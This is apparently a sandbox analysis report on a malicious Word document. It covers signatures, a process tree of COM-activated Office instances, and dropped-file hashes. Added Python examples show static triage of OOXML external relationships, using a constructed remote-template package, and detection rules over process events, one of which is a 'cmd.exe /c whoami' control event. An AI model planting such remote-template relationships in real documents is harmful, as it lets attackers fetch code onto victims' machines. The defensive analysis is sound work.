Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7-20240704-en
  • resource tags
    arch:x64 arch:x86 image:win7-20240704-en locale:en-us os:windows7-x64 system
  • submitted
    23-07-2024 05:58

General

  • Target

    6665ab44db118b972ce2a88e66118fb8_JaffaCakes118.doc

  • Size

    235KB

  • MD5

    6665ab44db118b972ce2a88e66118fb8

  • SHA1

    fee2da365e916da5c67e7c9ac1f011651b538009

  • SHA256

    3fb97d9c2e1864424882af8744978f5c367b27f5fa6b2a857621f126e758a6f9

  • SHA512

    0ebcd4d975f56369d1b53b9c3c0f78a4a2e5bd1e1a28a083286d08318bdc3372b793811b5fd692de9fbcc5132f960c3a1b32149ee35b1386e70bfc7f5cd9f71b

  • SSDEEP

    1536:zterThwxEM5OsmqrmrAK9hbZQHrTPUyZK/dRYiX/CN7Ta861YrkyXkHx:zUwxv5OsmqrmrAKHigdSivCFTH6C2Hx

Score
7/10

Malware Config

Signatures

  • Abuses OpenXML format to download file from external location 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
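
The target carries a .doc name, yet the signature that fired on every Office process concerns OpenXML relationship handling, so the first check an analyst wants before detonation is a static look at the container itself. The following is an added example, not part of the sandbox report and not the analysed sample: it builds a small constructed OOXML package in memory with a remote-template relationship (the package contents and the example.invalid URL are assumptions for illustration), sniffs the real container type by magic bytes, then lists every relationship marked TargetMode="External" and reports whether a VBA project part ships with the file.

```python
"""Static triage for an Office file flagged with
"Abuses OpenXML format to download file from external location".

Added example: the package built here is constructed for illustration and is
not the sample from the report. Word ignores the extension and sniffs content,
so a '.doc'-named zip is opened as OOXML and its external relationships are
followed at open time (remote template, linked/embedded objects).
"""
import io
import zipfile
import xml.etree.ElementTree as ET

OLE2_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy binary .doc/.xls (CFB)
ZIP_MAGIC = b"PK\x03\x04"                            # OOXML (.docx/.xlsx) container
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"


def sniff_container(data: bytes) -> str:
    """Classify by magic bytes rather than by file extension."""
    if data.startswith(OLE2_MAGIC):
        return "ole2"
    if data.startswith(ZIP_MAGIC):
        return "zip"
    return "unknown"


def find_external_relationships(data: bytes) -> list[dict]:
    """Return every relationship in any *.rels part with TargetMode="External".
    These are the hooks Office resolves (and may fetch over the network) on open."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{REL_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal").lower() == "external":
                    hits.append({
                        "part": name,
                        "id": rel.get("Id"),
                        "type": rel.get("Type", "").rsplit("/", 1)[-1],
                        "target": rel.get("Target"),
                    })
    return hits


def has_vba_project(data: bytes) -> bool:
    """vbaProject.bin inside the package means a macro project ships with the file."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return any(n.lower().endswith("vbaproject.bin") for n in zf.namelist())


def build_sample() -> bytes:
    """Constructed minimal OOXML package with a remote-template relationship
    in word/_rels/settings.xml.rels. The URL is a placeholder (assumption)."""
    settings_rels = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
    Target="http://example.invalid/template.dotm" TargetMode="External"/>
</Relationships>"""
    document_rels = f"""<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="{REL_NS}">
  <Relationship Id="rId1"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings"
    Target="settings.xml"/>
</Relationships>"""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/settings.xml", "<w:settings/>")
        zf.writestr("word/_rels/document.xml.rels", document_rels)
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    sample = build_sample()
    print("container:", sniff_container(sample))
    for hit in find_external_relationships(sample):
        print(f"{hit['part']}: {hit['id']} {hit['type']} -> {hit['target']}")
    print("vba project present:", has_vba_project(sample))
```

Run it against a real submission by replacing build_sample() with the file bytes; an "ole2" result means the legacy binary format, where the equivalent check is the OLE stream and link inspection that oletools performs rather than a .rels walk.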

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\6665ab44db118b972ce2a88e66118fb8_JaffaCakes118.doc"
    1⤵
    • Abuses OpenXML format to download file from external location
    • Drops file in Windows directory
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:688
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
      PID:2472

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    1⤵
    • Abuses OpenXML format to download file from external location
    • Enumerates system info in registry
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:2124

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    1⤵
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2532

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    1⤵
    • Abuses OpenXML format to download file from external location
    • Enumerates system info in registry
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    PID:2776

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    1⤵
    • Abuses OpenXML format to download file from external location
    • Enumerates system info in registry
    • Suspicious use of SetWindowsHookEx
    PID:1804
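
Reading the tree: WINWORD.EXE (PID 688) opened the document from the user's Temp directory, spawned splwow64.exe (the 32-to-64-bit print-spooler thunk that 32-bit Office starts whenever it touches printing APIs), and during the run three EXCEL.EXE instances and a second WINWORD.EXE started with -Embedding, the command-line switch COM passes when an OLE server is activated for an embedded or linked object. The following is an added example of detection logic over process-creation events, not tooling from the report: the events are constructed from the command lines shown above, while parent images, timestamps, the allowlists and the final cmd.exe control event (which the report does not show) are assumptions made so that every rule has a positive and a negative case.

```python
"""Detection over Office process-creation events, as an added example.

Sample events are constructed from the report's process list; parents,
timestamps, allowlists and the trailing cmd.exe event are assumptions.
"""
import re
from dataclasses import dataclass

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
# Children Office spawns on its own in normal use (assumed allowlist).
BENIGN_OFFICE_CHILDREN = {"splwow64.exe"}
USER_WRITABLE_DIRS = re.compile(r"\\(AppData\\Local\\Temp|Downloads)\\", re.I)
EMBEDDING_SWITCH = re.compile(r"(?i)(^|\s)-embedding\b")
COM_WINDOW_SECONDS = 60.0   # assumed correlation window


@dataclass(frozen=True)
class ProcEvent:
    ts: float            # seconds since sandbox start (assumed)
    pid: int
    image: str
    cmdline: str
    parent_image: str


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage_process_events(events):
    """Return (rule, pid) findings in event order. Rules:
    doc-from-temp     an Office app opened a document from a user-writable dir
    com-activation    an Office app started with -Embedding (COM/OLE activation,
                      as when an embedded object is instantiated) within the
                      window after such an open
    unexpected-child  an Office app spawned a child not on the allowlist
    """
    findings = []
    doc_open_ts = None
    for ev in sorted(events, key=lambda e: e.ts):
        img = basename(ev.image)
        is_office = img in OFFICE_IMAGES
        if is_office and USER_WRITABLE_DIRS.search(ev.cmdline):
            findings.append(("doc-from-temp", ev.pid))
            doc_open_ts = ev.ts
        if (is_office and EMBEDDING_SWITCH.search(ev.cmdline)
                and doc_open_ts is not None
                and ev.ts - doc_open_ts <= COM_WINDOW_SECONDS):
            findings.append(("com-activation", ev.pid))
        if (basename(ev.parent_image) in OFFICE_IMAGES
                and img not in OFFICE_IMAGES | BENIGN_OFFICE_CHILDREN):
            findings.append(("unexpected-child", ev.pid))
    return findings


OFFICE14 = r"C:\Program Files (x86)\Microsoft Office\Office14"
# Constructed from the report's command lines; parents and timestamps assumed.
SAMPLE_EVENTS = [
    ProcEvent(0.0, 688, OFFICE14 + r"\WINWORD.EXE",
              f'"{OFFICE14}\\WINWORD.EXE" /n '
              r'"C:\Users\Admin\AppData\Local\Temp\6665ab44db118b972ce2a88e66118fb8_JaffaCakes118.doc"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(1.5, 2472, r"C:\Windows\splwow64.exe",
              r"C:\Windows\splwow64.exe 12288", OFFICE14 + r"\WINWORD.EXE"),
    ProcEvent(4.0, 2124, OFFICE14 + r"\EXCEL.EXE",
              f'"{OFFICE14}\\EXCEL.EXE" /automation -Embedding',
              r"C:\Windows\System32\svchost.exe"),   # DCOM launcher, assumed
    ProcEvent(6.0, 2532, OFFICE14 + r"\WINWORD.EXE",
              f'"{OFFICE14}\\WINWORD.EXE" /Automation -Embedding',
              r"C:\Windows\System32\svchost.exe"),
    # Control event, NOT observed in the report: exercises unexpected-child.
    ProcEvent(90.0, 4000, r"C:\Windows\System32\cmd.exe", r"cmd.exe /c whoami",
              OFFICE14 + r"\WINWORD.EXE"),
]

if __name__ == "__main__":
    for rule, pid in triage_process_events(SAMPLE_EVENTS):
        print(f"{rule:<17} pid={pid}")
```

The com-activation rule is deliberately correlated to a preceding document open rather than fired on -Embedding alone, since COM-activated Office instances are routine on desktops where other applications automate Office; the report's value as a detection signal is the cluster of activations immediately after a document was opened from Temp.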

    Network

    MITRE ATT&CK Enterprise v15


    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      c138d29f3ca84c790030d441a99b38c0

      SHA1

      39bad3e1a87bee87f1030f9c1d12eda88e139ce7

      SHA256

      4e6b4ce2c4c6d47b74b8b85db93d52af84cd46654879e8cd1b21ea5b1e399dce

      SHA512

      69679671c49909865b1a6867cb0ac276e7d5f715dda2434bdc6988b97e1d7e780abebfceeee7a7f3489902c748a15c2902f12f303bf2ce8d920997c2dcc2cb65

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{9D68B317-C517-4CD8-9B6B-3B4232F27C37}.FSD

      Filesize

      128KB

      MD5

      4076eae8d81022c9a8d66638efb5f77b

      SHA1

      8a5e4edf90b4d464d6ed9b446705f59ab3743a87

      SHA256

      df8a38085fff7ca7b59c379f3040691011473e6e11b567f1f72e2472a119104c

      SHA512

      d174427c1ae809f49b9d50a5e6c5c8881fdebe5767bad44ccfaec8df75872f54099a8502fc29f22e3d576bdbbbbada68a3553e2927e37d331ba4700106d943ce

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSF-CTBL.FSF

      Filesize

      114B

      MD5

      06a0ef7eb18c37c07ca9a34d4160efd1

      SHA1

      031db20daee53c9acce262a82cec2a17bb10675a

      SHA256

      4fdd7305291df86be389770b0a97f524e7a79f17fe0b671415dedb0885fa8457

      SHA512

      3dbf849e85b2da4134d0b98b9a3f01ac8d20434f5f7cca140ef48aa7b289c985d22c0efc158ba6e6da10805b3052660a0a07cfa4d48faa5a49d5894ff7f7692c

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

      Filesize

      128KB

      MD5

      8822bdedb818b661c8219569da769992

      SHA1

      cbd4645786f606b921c823b9c1723579f5ac4b2d

      SHA256

      e6e149128fab0cf0f7e27b09001e0e0e675214036e8d4e8b70ae9dabc14be62a

      SHA512

      1922a189f341d7edc9a8b1940a5bc022a79d728075029ffcfdfa7c3af0728feb18025eb951ba29a7f432fff8bc17e49afef03d99700db216497bacafd4939930

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{C3BA8A24-F369-4AC2-BFB4-594285910D2E}.FSD

      Filesize

      128KB

      MD5

      3c018b9f8bdc836bf038bc651a36a565

      SHA1

      1aa85ece8aed5bc4257530757d615b2a3c4c1c62

      SHA256

      a217c417491d1fc091bd88de11a34d8f234f209bde29324ed994b07d224aa35a

      SHA512

      ba1c725c59798667edc4a6ef6bc6981219af0e29ad43bbfff2affd600c9f2a43f7b8a662855c58ac1f330aed39c7da3c6fa22a38d8c5391964c0e56f5a9a9de3

    • C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSF-{0E1EEE64-E8C6-4E2A-9759-63CF07FD8988}.FSF

      Filesize

      114B

      MD5

      81fc781f4ea5a6bf6ba4357691e78671

      SHA1

      fa9049e8f4cb31220446e5e0b439fb74a9946352

      SHA256

      5776f0a9e68c038f2243dac8b6a779ee7eed8a1660207527e629241f44790013

      SHA512

      8243aa9f25b33264180875744a7a45bfcc11aeeab66177c559b9e0beb2a98c63bad50367f7b1cc319a10af9885e013dad2b65e80225d7703dc372cd5a3612cf6

    • C:\Users\Admin\AppData\Local\Temp\VBE\MSForms.exd

      Filesize

      143KB

      MD5

      537b53dd99d261f6b6c8ed93448d583b

      SHA1

      0f3c056593f7359da96f759fc0a27fc5c0474241

      SHA256

      427427b4a498c5d4246d454bfb11ecc3d532e0601b83187b1b23d3a84264e89b

      SHA512

      9c516409b087d0c3010b423c5521dd0a47011c71c9d2879e870f95056559a11d54229eb6b8799cd65251edc3720ff246670727d8a48b883b4ac264c1f491f5a2

    • C:\Users\Admin\AppData\Local\Temp\{9305588A-1ECB-4B17-87BA-0B14C37DACF4}

      Filesize

      128KB

      MD5

      6cae94b5c1ac2709a4ab72f9a0a4e2d5

      SHA1

      53eff141d2af533be527778c69b81f86986e4b3f

      SHA256

      936a82dbb443032a193d0815756bc6c182e9b2215bb0e95b27ec1ca2717bcf6f

      SHA512

      e0540a16b66d15eb1edf4eba23d920dee3022e3c8e84f9a530d803a0aaf7aec1e4a28c72d6c13b745436aa3f494578c9426d42756f937b4667ef79b32a872ef8

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      19KB

      MD5

      ee448b2f4ad5e739a46dbf159ff1edb0

      SHA1

      504534902c94e2000f37f475043e78777dbca60e

      SHA256

      9873e241cabe447017727d3661a016d4a3238d6448e9d00d4e21600e38def786

      SHA512

      39cccd918863c0c469b3666637886e1cdd949667e3bd9310ecd6a46a834fc541d85ffba617bde4971ef8062c73def4cb824e9f93993159775dc406f96d99b397

    • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

      Filesize

      2B

      MD5

      f3b25701fe362ec84616a93a45ce9998

      SHA1

      d62636d8caec13f04e28442a0a6fa1afeb024bbb

      SHA256

      b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

      SHA512

      98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

    • memory/688-59-0x0000000004B30000-0x0000000004D30000-memory.dmp

      Filesize

      2.0MB

    • memory/688-60-0x000000000EA00000-0x000000000EB00000-memory.dmp

      Filesize

      1024KB

    • memory/688-9-0x00000000714BD000-0x00000000714C8000-memory.dmp

      Filesize

      44KB

    • memory/688-2-0x00000000714BD000-0x00000000714C8000-memory.dmp

      Filesize

      44KB

    • memory/688-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/688-0-0x000000002FEE1000-0x000000002FEE2000-memory.dmp

      Filesize

      4KB

    • memory/2124-1022-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2532-1029-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1077-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1146-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1242-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1194-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1291-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1339-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1387-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1435-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1030-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1032-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1033-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1034-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1031-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1489-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB

    • memory/2532-1491-0x0000000000320000-0x0000000000420000-memory.dmp

      Filesize

      1024KB